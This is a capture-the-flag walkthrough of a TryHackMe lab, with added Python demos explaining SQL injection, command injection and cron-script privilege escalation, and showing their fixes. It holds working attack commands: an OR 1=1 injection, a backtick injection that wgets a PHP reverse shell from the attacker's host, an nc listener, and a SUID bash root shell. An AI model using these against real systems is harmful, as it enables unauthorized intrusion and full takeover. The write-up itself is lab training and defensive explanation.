Hi everyone!
In this story I will cover the ‘Minotaur’s Labyrinth’ room from TryHackMe, rated Medium.
The main topics are: Enumeration, SQL Injection, Command Injection and Privilege Escalation.
Alright, let’s start.
Enumeration
As always, we start with a pretty classic Nmap Scan.
sudo nmap -p- -sV -T4 -A -o all_ports <MACHINE_IP>
- -sV = Service version detection.
- -T4 = Timing template 4 (aggressive timing).
- -p- = Scan all ports.
- -A = Aggressive mode (OS detection, version detection, script scanning and traceroute).
- -o = Output to a file.
Port 21:
It is running ProFTPD and it allows anonymous login.
Let’s connect to it as anonymous using ftp.
Here we find a directory and some files.
Hint: Remember ALWAYS to use ‘ls -al’ and not only ls.
Grab those files with get command and grab the first flag too.
One of those files speaks about a timer… don’t forget this, it’s gonna be useful later.
Port 3306:
As you can see on the Nmap output our IP is not allowed to connect to this MariaDB instance, so, we can’t do much on it.
Port 80/443:
Here we find a login page. We still don’t have credentials tho.
Checking the source code we find an interesting js file.
As you can see there is a comment that tells us how to build the password.
You can do this manually or use node to do it faster.
Just copy the function and the next line to build it up.
Now, use Daedalus as the username and the found password to login.
Dashboard
Here we see a search section where we can search for People or Creature.
SQL Injection
We could take advantage of this just using `' OR 1=1 -- -` or just going to the /api directory (in the source code there is a file called userlvl.js that leaks this endpoint) and looking for the read.php file.
Here we find some usernames and some password hashes.
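To show why the `' OR 1=1 -- -` payload above returns every row, here is an added example (not code from the room or from the TryHackMe author) that rebuilds the search in Python against an in-memory SQLite table with constructed sample names. The first function splices the search term into the SQL text, as the vulnerable dashboard appears to do; the second binds it as a parameter, which is the fix. Table and column names are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for the dashboard's People/Creature search.
SAMPLE_ROWS = [
    ("Daedalus", "person"),
    ("M!n0taur", "creature"),
    ("Theseus", "person"),
]


def _fresh_db():
    """Build a throwaway in-memory database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE people (name TEXT, kind TEXT)")
    conn.executemany("INSERT INTO people VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def search_concatenated(term):
    """Vulnerable: the user's term becomes part of the SQL text itself.

    With term = "' OR 1=1 -- -" the statement becomes
        SELECT name FROM people WHERE name = '' OR 1=1 -- -'
    and the trailing quote is swallowed by the comment, so every row matches.
    """
    conn = _fresh_db()
    query = "SELECT name FROM people WHERE name = '" + term + "'"
    return [row[0] for row in conn.execute(query)]


def search_parameterized(term):
    """Fixed: the driver binds the value, so quotes inside it are only data."""
    conn = _fresh_db()
    rows = conn.execute("SELECT name FROM people WHERE name = ?", (term,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    payload = "' OR 1=1 -- -"
    print("concatenated :", search_concatenated(payload))
    print("parameterized:", search_parameterized(payload))
```

Running it prints all three constructed names for the concatenated query and an empty list for the parameterized one; a legitimate lookup such as `Theseus` still works in both.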
We can use john, hashcat or some online tools.
I used crackstation in this scenario and it cracked almost all the hashes.
Since we have some password we could try to login again in the panel.
M!n0taur and his password works fine and here we see 2 things:
- Second flag
- Secret_Stuff page
In the secret_stuff page we see a super secret panel that echoes back whatever you put inside it.
It looks like it is running system command “echo” to do this.
Let’s try some common techniques for Command Injection.
Using backticks (``) works pretty well and leads to Command Injection.
In the THM page the hint says that some characters are blacklisted, so let’s build a payload using only allowed characters.
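The secret panel behaves like `echo <input>` run through a shell, and the hint about blacklisted characters explains why backticks still get through. The following added example (my own Python, not the room's PHP) reproduces that: a character blacklist that misses backticks, a shell-based echo that lets command substitution run, and two fixes (quoting the argument, or not involving a shell at all). The blacklist contents are a constructed assumption, since the room does not publish its list. It needs a POSIX `/bin/sh`.

```python
import shlex
import subprocess

# Constructed blacklist: a filter that blocks the usual separators but
# forgets backticks, which is the gap the writeup exploits.
BLACKLISTED = set(";|&$(){}")


def passes_blacklist(text):
    """Return True if no blacklisted character is present (the weak check)."""
    return not any(ch in BLACKLISTED for ch in text)


def echo_via_shell(text):
    """Vulnerable: input is pasted into a shell command line (like the panel)."""
    out = subprocess.run("echo " + text, shell=True,
                         capture_output=True, text=True)
    return out.stdout.rstrip("\n")


def echo_via_shell_quoted(text):
    """Better: if a shell is unavoidable, quote the argument so it stays literal."""
    out = subprocess.run("echo " + shlex.quote(text), shell=True,
                         capture_output=True, text=True)
    return out.stdout.rstrip("\n")


def echo_without_shell(text):
    """Best: pass an argv list; no shell ever parses the input."""
    out = subprocess.run(["echo", text], capture_output=True, text=True)
    return out.stdout.rstrip("\n")


if __name__ == "__main__":
    # Constructed, harmless probe: a backtick substitution of another echo.
    probe = "hi `echo injected`"
    print("blacklist passes:", passes_blacklist(probe))
    print("shell          :", echo_via_shell(probe))
    print("shell + quote  :", echo_via_shell_quoted(probe))
    print("no shell       :", echo_without_shell(probe))
```

The shell version prints `hi injected` (the substitution ran), while the quoted and argv versions print the input back literally. Blacklists only ever enumerate the characters someone remembered; removing the shell removes the whole class of bug.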
`wget <VPN_IP>/shell.php -O /tmp/shell.php`
Where shell.php is the classic php reverse shell.
Now, start a listener and then call the shell.
nc -nvlp 4444
`php /tmp/shell.php`
Privilege Escalation
Right now we have a shell as the daemon user.
If you remember at the start of the machine, in the ftp, we found a file that was talking about a timer…
Looking around we find 2 interesting directories in the / directory.
- reminders
- timers
In the reminders directory we see a .txt file with stuff inside.
In the timers directory we find a Bash script that we are able to modify.
Since there is a high chance that this script is run by a cron-like job, we can easily use this for privilege escalation.
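The root cause here is a root-run script that a low-privileged user can write to. As an added example (not part of the writeup), this small Python audit parses user-style crontab lines (five time fields, or an `@reboot`-style shortcut, then the command) and flags any referenced script that is group- or world-writable. The crontab lines and script files are constructed in a temporary directory so it runs offline; the interpreter-prefix handling (`bash /path/script.sh`) and the 5-field format are assumptions.

```python
import os
import stat
import tempfile

CRON_TIME_FIELDS = 5
INTERPRETERS = {"bash", "sh", "python", "python3"}


def script_from_cron_line(line):
    """Return the absolute script path a crontab line runs, or None."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    # "@reboot cmd" style entries have one schedule token instead of five.
    cmd = parts[1:] if parts[0].startswith("@") else parts[CRON_TIME_FIELDS:]
    if not cmd:
        return None
    prog = cmd[0]
    # "bash /timers/x.sh": the script is the interpreter's first argument.
    if os.path.basename(prog) in INTERPRETERS and len(cmd) > 1:
        prog = cmd[1]
    return prog if prog.startswith("/") else None


def writable_by_non_owner(path):
    """True if the group or others have write permission on the file."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron_lines(lines):
    """Return the scheduled scripts that a non-owner could modify."""
    findings = []
    for line in lines:
        prog = script_from_cron_line(line)
        if prog and os.path.isfile(prog) and writable_by_non_owner(prog):
            findings.append(prog)
    return findings


def demo():
    """Build two constructed scripts, one locked down and one loose, and audit them."""
    workdir = tempfile.mkdtemp()
    safe = os.path.join(workdir, "timer.sh")
    loose = os.path.join(workdir, "cleanup.sh")
    for path in (safe, loose):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\necho tick\n")
    os.chmod(safe, 0o755)   # owner-only write: fine
    os.chmod(loose, 0o777)  # anyone can rewrite what root will run: finding
    crontab = [
        "# constructed crontab for the audit demo",
        "* * * * * /bin/bash " + safe,
        "*/5 * * * * " + loose,
    ]
    return audit_cron_lines(crontab), loose


if __name__ == "__main__":
    found, expected = demo()
    print("writable scheduled scripts:", found)
```

On a real box the same check belongs in a hardening script: walk `/etc/crontab`, `/etc/cron.d/*` and `crontab -l` output, and fix any hit with `chmod go-w` plus a root owner.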
Let’s modify its content with this:
cp /bin/bash /tmp/rootshell && chmod u+s /tmp/rootshell
This is just copying the bash binary and giving it SUID permissions.
After waiting a minute this will be executed and we will find the binary in the /tmp directory.
/tmp/rootshell -p
And voilà, we have root permissions :).
This is it, thanks for reading and as always: Happy Hacking! 😊🎉💕